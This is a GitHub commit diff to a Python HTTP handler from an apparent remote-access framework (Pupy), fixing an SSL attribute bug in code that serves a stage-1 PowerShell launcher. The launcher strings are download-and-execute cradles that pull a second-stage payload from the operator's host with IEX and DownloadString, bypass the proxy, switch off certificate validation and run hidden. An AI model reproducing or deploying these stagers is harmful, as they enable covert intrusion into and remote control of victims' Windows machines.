Fixed something,Add powershell exec using -Enc

This commit is contained in:
Dc3 2017-03-11 02:43:04 +08:00 committed by GitHub
parent d8591a9263
commit 98565a75ae
1 changed files with 4 additions and 4 deletions

View File

@ -92,16 +92,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
self.end_headers() self.end_headers()
if self.server.useTargetProxy == True: if self.server.useTargetProxy == True:
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration" print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
if not self.ssl: if not self.server.ssl:
launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
else: else:
launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
else: else:
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration" print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
if not self.ssl: if not self.server.ssl:
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
else: else:
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False) launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
self.wfile.write(launcher) self.wfile.write(launcher)
print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !" print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"